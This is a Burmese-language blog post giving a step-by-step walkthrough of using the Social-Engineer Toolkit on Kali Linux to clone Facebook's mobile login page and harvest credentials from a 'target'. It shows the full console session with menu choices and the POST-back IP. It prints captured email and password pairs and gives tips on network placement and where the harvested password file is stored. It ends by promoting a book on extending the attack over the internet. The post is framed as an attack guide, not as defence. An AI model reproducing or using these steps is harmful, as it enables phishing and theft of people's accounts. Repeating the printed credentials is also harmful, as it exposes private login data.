Adsense

OUO Banner

Latest Posts

Social Engineering Attack / Website Cloning



Kali Linux
Make clone website with se toolkit
.
ရေးထားတာ ကြာပါပြီ။ 2015 ကတည်းက ရေးခဲ့တာလေးပါ
.........................................
Terminal မှာ setoolkit လို့ ရိုက်ခေါ်လိုက်ပါ။ မှတ်မိလွယ်အောင် ဒီလို မှတ်ထားပါ (se tool kit) ပေါ့။ ရိုက်ရင်တော့ ပေါင်းရိုက်ရတယ်နော်။

root@kmn:~# setoolkit
ကြားမှာ စာတွေ အများကြီး ဖျောက်ထားပါတယ်။ အောက်ဆုံး စာတန်းကိုပဲ အဓိက ပြောချင်လို့ပါ။ agreement မေးတာပေါ့။
Do you agree to the terms of service [y/n]: y  ပဲ ဖြေရပါမယ်။
ဒါဆိုရင်တော့ ကျွန်တော်တို့ setoolkit ကို အသုံးပြုနိုင်ပြီဖြစ်ပါတယ်။

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set>
 သူ့ရဲ့ menu လေးတွေကို ကြည့်ရအောင်ပါ။
အထက်ပါအတိုင်းပဲ ရှင်းရှင်းလေး ဖော်ပြထားတာကို တွေ့ရပါတယ်။ ကျွန်တော်ကတော့ ဒီနေရာမှာ Site clone လုပ်မှာဖြစ်လို့ 1 ကိုပဲ ရွေးပါတယ်
set> 1 ရေးပြီး enter လိုက်ပါတယ်။ အောက်ပါအတိုင်း တွေ့ရပါတယ်။ 1 ထဲမှာတင် ထပ်မံ ခွဲထားတဲ့ menu တွေပါ။

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.

set> 2 ကို ရေးလိုက်ပါတယ်။ Website Attack Vectors ကို သုံးမှာမို့ပါ။ အပေါ်က menu မှာ ပြန်ကြည့်ရင် 2) Website Attack Vectors ဆိုတာကို တွေ့ရမှာပါ။


ဘာက ဘာအတွက်ဆိုတာကို ENG လို ရှင်းပြထားတာတွေ ဒီအပေါ်မှာ ရှိပါသေးတယ်။
   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu

set:webattack>3
   3) Credential Harvester Attack Method ကို သုံးမှာမို့ ကျွန်တော်က  ၃  ရွေးလိုက်ပါတယ်။

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
 
   1) Web Templates
   2) Site Cloner #site ကို clone လုပ်မှာမို့ ဒီ ဟာကိုပဲ သုံးပါမယ်။
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>
   2) Site Cloner နော်

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:ဒီနေရာမှာ မိမိရဲ့ ip address ကို ဖြည့်ရမှာဖြစ်ပါတယ်။ (ifconfig)

set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.10.10
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com

set:webattack> Enter the url to clone:https://m.facebook.com  ဒီနေရာမှာ ကိုယ် clone လုပ်မယ့် site ကို ဖြည့်ရမှာပါ။ ကျွန်တော်ကတော့ mobile user ကို target ထားပြီး ဒီလိုဖြည့်လိုက်ခြင်း ဖြစ်ပါတယ်။

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
[!] Apache may be not running, do you want SET to start the process? [y/n]: y
ဒီနေရာမှာ service apache start လုပ်မထားရသေးလို့ မေးတာပါ။ ကျွန်တော်ဖြေပြထားသလို y ပေါ့

[ ok ] Starting apache2 (via systemctl): apache2.service.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www/html directory
[*] All files have been copied to /var/www/html
[*] SET is now listening for incoming credentials. You can control-c out of this and completely exit SET at anytime and still keep the attack going.
[*] All files are located under the Apache web root directory: /var/www/html
[*] All fields captures will be displayed below.
[Credential Harvester is now listening below...]

ခုဆိုရင်တော့ ကျွန်တော့် target ဆီက ဝင်လာမယ့် အချိန်ကို စောင့်နေပြီဖြစ်ပါတယ်။ သူ့ဆီကို ပေးရမယ့် link က ကျွန်တော်တို့ ဖြည့်ခဲ့တဲ့ ip address ပါပဲ။
ကျွန်တော်က နေရာ သုံးခုကနေ ဝင်ပြထားပါတယ်


('Array\n',)
('(\n',)
('    [lsd] => AVooGz02\n',)
('    [display] => \n',)
('    [enable_profile_selector] => \n',)
('    [isprivate] => \n',)
('    [legacy_return] => 0\n',)
('    [profile_selector_ids] => \n',)
('    [return_session] => \n',)
('    [skip_api_login] => \n',)
('    [signed_next] => \n',)
('    [trynum] => 1\n',)
('    [timezone] => 480\n',)
('    [lgndim] => eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzQxLCJjIjoyNH0=\n',)
('    [lgnrnd] => 231856_Swb2\n',)
('    [lgnjs] => 1491186248\n',)
('    [email] => khitminnyo@gmail.com\n',)
('    [pass] => appleasdfghjkl\n',)
(')\n',)
('Array\n',)
('(\n',)
('    [lsd] => AVooGz02\n',)
('    [display] => \n',)
('    [enable_profile_selector] => \n',)
('    [isprivate] => \n',)
('    [legacy_return] => 0\n',)
('    [profile_selector_ids] => \n',)
('    [return_session] => \n',)
('    [skip_api_login] => \n',)
('    [signed_next] => \n',)
('    [trynum] => 1\n',)
('    [timezone] => -390\n',)
('    [lgndim] => eyJ3IjozOTMsImgiOjY5OSwiYXciOjM5MywiYWgiOjY5OSwiYyI6MzJ9\n',)
('    [lgnrnd] => 231856_Swb2\n',)
('    [lgnjs] => 1491200662\n',)
('    [email] => admin@khitminnyo.com\n',)
('    [pass] => ilovekalilinux2016.2\n',)
(')\n',)
('Array\n',)
('(\n',)
('    [lsd] => AVooGz02\n',)
('    [display] => \n',)
('    [enable_profile_selector] => \n',)
('    [isprivate] => \n',)
('    [legacy_return] => 0\n',)
('    [profile_selector_ids] => \n',)
('    [return_session] => \n',)
('    [skip_api_login] => \n',)
('    [signed_next] => \n',)
('    [trynum] => 1\n',)
('    [timezone] => \n',)
('    [lgndim] => \n',)
('    [lgnrnd] => 231856_Swb2\n',)
('    [lgnjs] => n\n',)
('    [email] => aeroplane@gmail.com\n',)
('    [pass] => flying123456\n',)
('    [login] => 1\n',)
(')\n',)



ဒီအချက်တွေကို အသုံးပြုဖို့အတွက်တော့ သတိထားစရာအချက် ၂ခု ရှိပါတယ်။
၁။ ကိုယ့် target နဲ့ ကိုယ်ဟာ network တစ်ခုတည်းအောက်မှာ ရှိနေရမယ်။ (same network)
၂။ မိမိ လိုချင်တာကို မရမချင်း အင်တာနက် ချိတ်ဆက်ထားဖို့ လိုအပ်မှာ ဖြစ်ပါတယ်။
(Same Network မဟုတ်ဘဲ WAN မှာ အသုံးပြုနိုင်ဖို့အတွက်တော့ နည်းလမ်းလေးတွေ လိုပါတယ်)
အောက်ပါစာအုပ်လေး မှာ အပြည့်အစုံ ပါဝင်မှာဖြစ်ပါတယ်။ 😀😀😀
ဒီဇင်ဘာလ ၃ ရက်နေ့မှာ စတင် ဖြန့်ချီသွားမှာဖြစ်ပါတယ်။ စာအုပ်လေးထဲမှာ Member Form လေး တစ်ခု ပါဝင်ပြီး Facebook Group ထဲ ဝင်ရောက်ခွင့် နဲ့ http://www.mmaiotraining.org ကို ဝင်ရောက်ကြည့်ရှုခွင့်ပါ ပူးတွဲ ရရှိမှာဖြစ်ပါတယ်။
မှတ်ချက်။      ။ www.khitminnyo.com တွင် တင်ထားသော အကြောင်းအရာများနှင့် စာအုပ်တွင် ပါဝင်သည့် အကြောင်းအရာများသည် တူညီခြင်း မရှိပါ။


terminal ကို ပိတ်လိုက်လည်း ရပါတယ်။ ကွန်ပျူတာ မပိတ်ဖို့နဲ့ ကွန်ပျူတာမှာ အင်တာနက် ချိတ်ထားဖို့ သာ အဓိက လိုအပ်ပါတယ်။

ကိုယ်လိုချင်တာ မရမီတော့ ဒီလိုပဲ စောင့်ရမှာဖြစ်ပါတယ်။
အဲမှာ အားနည်းချက်တစ်ခု ရှိတာကတော့ ကျွန်တော်တို့ ပေးတဲ့ ip link ကို ဖွင့်လိုက်တယ်ဆိုပါစို့။ mail နဲ့  password မှားသွားရင်ဖြစ်ဖြစ် မှန်သွားရင်ဖြစ်ဖြစ် မူလ website အစစ်ထဲကို ရောက်သွားမှာဖြစ်ပါတယ်

password ဖိုင်ကို သွားဖွင့်ကြည့်ချင်ရင်တော့ file  >> other location >> Computer >> var >> www >> html ထဲမှာသွားဖွင့်ကြည့်နိုင်ပါတယ်။
..............................................................................................................

Thanks


Khit Minnyo

No comments